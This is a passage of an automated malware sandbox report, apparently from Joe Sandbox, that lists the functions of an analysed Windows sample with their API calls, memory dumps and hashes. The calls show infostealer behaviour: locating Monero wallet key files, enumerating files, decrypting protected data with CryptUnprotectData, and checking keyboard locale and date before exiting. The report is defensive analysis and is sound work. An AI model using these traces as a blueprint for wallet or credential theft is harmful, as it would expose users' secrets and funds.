                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                      • String ID: \*.*
                      • API String ID: 2325840235-1173974218
                      • Opcode ID: 2690b25f4e33c0449b1ef31de7f5a34f856aca71f7c86fc0c77e841a1695f668
                      • Instruction ID: d68bdf087586d44505f9172557ed08751503d0aa610e33fda2146417d78e336e
                      • Opcode Fuzzy Hash: 2690b25f4e33c0449b1ef31de7f5a34f856aca71f7c86fc0c77e841a1695f668
                      • Instruction Fuzzy Hash: 88F1CE718105689ADB27FB61DC95AEE7779AF54300F41429AB00A6A0D1EF307B8ACF61
                      Function 003DDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003F14B0,003F0C2A), ref: 003DDAEB
                      • StrCmpCA.SHLWAPI(?,003F14B4), ref: 003DDB33
                      • StrCmpCA.SHLWAPI(?,003F14B8), ref: 003DDB49
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003DDDCC
                      • FindClose.KERNEL32(000000FF), ref: 003DDDDE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
                      • Opcode ID: 00ccb7a0233258c4f7f92ada2e15db2db91f8bf3fc49c332e7e77d13af366db1
                      • Instruction ID: 26e6340185947ee64cbad8e92edf18a9ce31be57b5a80c6c15d2dad5c141a113
                      • Opcode Fuzzy Hash: 00ccb7a0233258c4f7f92ada2e15db2db91f8bf3fc49c332e7e77d13af366db1
                      • Instruction Fuzzy Hash: B7918773900118A7DB16FBB1EC969FD777DAF84300F418759F9069A181EE34AB09CB92
                      Function 003E7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • GetKeyboardLayoutList.USER32(00000000,00000000,003F05AF), ref: 003E7BE1
                      • LocalAlloc.KERNEL32(00000040,?), ref: 003E7BF9
                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 003E7C0D
                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 003E7C62
                      • LocalFree.KERNEL32(00000000), ref: 003E7D22
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                      • String ID: /
                      • API String ID: 3090951853-4001269591
                      • Opcode ID: 43aa595ad9488e148467d0cf245839f8d4775e12f90f502982319a919e2469d4
                      • Instruction ID: 970f10f0abf797c3be424b9574be4c9e9b3e675356c243356ea807f3d056998e
                      • Opcode Fuzzy Hash: 43aa595ad9488e148467d0cf245839f8d4775e12f90f502982319a919e2469d4
                      • Instruction Fuzzy Hash: AC416B71901268ABDB25DB95DC89BEEB7B8FF44700F2042D9E009662C1DB342F85CFA1
                      Function 003DE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,003F0D73), ref: 003DE4A2
                      • StrCmpCA.SHLWAPI(?,003F14F8), ref: 003DE4F2
                      • StrCmpCA.SHLWAPI(?,003F14FC), ref: 003DE508
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003DEBDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 433455689-1173974218
                      • Opcode ID: 0eac99089bbbe079ac24820d878f7e6c0dc51c9baaa382e2cc2e9d048893b0d7
                      • Instruction ID: fb9e932435c413618923622c77a967418c1c0aecd5f6b55a7c521ab17aaae608
                      • Opcode Fuzzy Hash: 0eac99089bbbe079ac24820d878f7e6c0dc51c9baaa382e2cc2e9d048893b0d7
                      • Instruction Fuzzy Hash: 571296329005689BDB16FB61DC96EED7379AF54300F4142A9B50A9A0D2EF307F49CF92
                      Function 0079D4DC Relevance: 9.2, Strings: 6, Instructions: 1658COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 2Z?$?1_U$Aj$HDs$Ko<o$j]&
                      • API String ID: 0-3419901200
                      • Opcode ID: 26d3a6392acbf662acd0a582a173509615d8ce2a9ac00a5c27e02089991f3cce
                      • Instruction ID: ab94a45e1f479e9d644185acded72048f1350e506788ff08fa686184d6ea047a
                      • Opcode Fuzzy Hash: 26d3a6392acbf662acd0a582a173509615d8ce2a9ac00a5c27e02089991f3cce
                      • Instruction Fuzzy Hash: 4DB25CF3A0C2149FE3086E2DEC8567ABBE9EF94720F1A453DEAC5C3744E93558018693
                      Function 0079BAA4 Relevance: 9.0, Strings: 6, Instructions: 1541COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: cf~w$goL$ryz$xw$._$2kv
                      • API String ID: 0-2000573751
                      • Opcode ID: d024f2c146b4f83e44c50dd880ea39d2f43801ae3ab1902afc7d864ae77fd1e7
                      • Instruction ID: c2625d78386cb366a4bb5decb20dabc2ac218e4171ada224c170327253032372
                      • Opcode Fuzzy Hash: d024f2c146b4f83e44c50dd880ea39d2f43801ae3ab1902afc7d864ae77fd1e7
                      • Instruction Fuzzy Hash: CCB2E3F360C200AFE3046F29EC8566AFBE5EF94720F16492DEAC4C3744EA3558458797
                      Function 003D9AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                      Download Yara Rule
                      APIs
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N=,00000000,00000000), ref: 003D9AEF
                      • LocalAlloc.KERNEL32(00000040,?,?,?,003D4EEE,00000000,?), ref: 003D9B01
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N=,00000000,00000000), ref: 003D9B2A
                      • LocalFree.KERNEL32(?,?,?,?,003D4EEE,00000000,?), ref: 003D9B3F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptLocalString$AllocFree
                      • String ID: N=
                      • API String ID: 4291131564-3533945350
                      • Opcode ID: 458807886868430c4f3f89b9d31a5ee65a9240c7e69118a14ac6f6d019916dcc
                      • Instruction ID: f543e8a2ee28026cf39b78fae8b0572c661649e7744b599067ea7695f611f35a
                      • Opcode Fuzzy Hash: 458807886868430c4f3f89b9d31a5ee65a9240c7e69118a14ac6f6d019916dcc
                      • Instruction Fuzzy Hash: 0911A4B4241208EFEB10CFA4DC95FAA77B5FB89714F20805AF9159B390C775A941CB50
                      Function 00798E47 Relevance: 8.3, Strings: 6, Instructions: 843COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: X}_$_q[E$f3e{$xQZ]${!$Nk
                      • API String ID: 0-1319305315
                      • Opcode ID: a6af9810b06665d235d31cb8a6879763842b35f73010f9037448c30d4e152f62
                      • Instruction ID: 5ece8489511640dc9fd08f3799fcb239be81f0acb6f8f7d4e5ccbac5eb59ff95
                      • Opcode Fuzzy Hash: a6af9810b06665d235d31cb8a6879763842b35f73010f9037448c30d4e152f62
                      • Instruction Fuzzy Hash: 2D42F5F360C2049FE7046F29EC8567ABBE5EF94320F1A453DEAC583744EA3698058797
                      Function 007896A8 Relevance: 7.9, Strings: 5, Instructions: 1612COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: *f^$8zs$<{sW$uEv$z95+
                      • API String ID: 0-4223818057
                      • Opcode ID: 5882e667c5f2aef00311fa5014d41596a6342462f9adcd899791c0d7c67596b1
                      • Instruction ID: 33cf289e9e069791f87d1f41c6c03277fd7817a1c95f6c9ee5bf7251c2b35f08
                      • Opcode Fuzzy Hash: 5882e667c5f2aef00311fa5014d41596a6342462f9adcd899791c0d7c67596b1
                      • Instruction Fuzzy Hash: 62B208F3A086009FE3046E2DEC85B7ABBE9EF94320F16463DEAC4C7744E63558158697
                      Function 003DC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 003DC871
                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 003DC87C
                      • lstrcat.KERNEL32(?,003F0B46), ref: 003DC943
                      • lstrcat.KERNEL32(?,003F0B47), ref: 003DC957
                      • lstrcat.KERNEL32(?,003F0B4E), ref: 003DC978
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$BinaryCryptStringlstrlen
                      • String ID:
                      • API String ID: 189259977-0
                      • Opcode ID: be9896e325d9ab8ec2edd628364565b1dd5c6cdd791416fee3a8bde6c102b28e
                      • Instruction ID: 0300de41b9874e3572b62d1facd1c57c60cd6be3695d263161bcddac7fb0a69a
                      • Opcode Fuzzy Hash: be9896e325d9ab8ec2edd628364565b1dd5c6cdd791416fee3a8bde6c102b28e
                      • Instruction Fuzzy Hash: 6141AFB991421EDFCB10CFA4DD88BFEB7B8BB48304F1441A9E509A6280D7709A84CF91
                      Function 003E6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                      Download Yara Rule
                      APIs
                      • GetSystemTime.KERNEL32(?), ref: 003E696C
                      • sscanf.NTDLL ref: 003E6999
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003E69B2
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003E69C0
                      • ExitProcess.KERNEL32 ref: 003E69DA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$System$File$ExitProcesssscanf
                      • String ID:
                      • API String ID: 2533653975-0
                      • Opcode ID: 3b87af77118ec516e6d5482b8eeabc89412143cea0a5ce06c4125ba9ad506a15
                      • Instruction ID: f58cd202092e8146cb452fe4076cf58dae2b2947f17186bdc6d862a7b7ad7e13
                      • Opcode Fuzzy Hash: 3b87af77118ec516e6d5482b8eeabc89412143cea0a5ce06c4125ba9ad506a15
                      • Instruction Fuzzy Hash: 7421FC75D10218ABCF45EFE4D945AEEB7B6FF48300F04852EE406E3250EB345605CB65
                      Function 003D7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 003D724D
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003D7254
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 003D7281
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 003D72A4
                      • LocalFree.KERNEL32(?), ref: 003D72AE
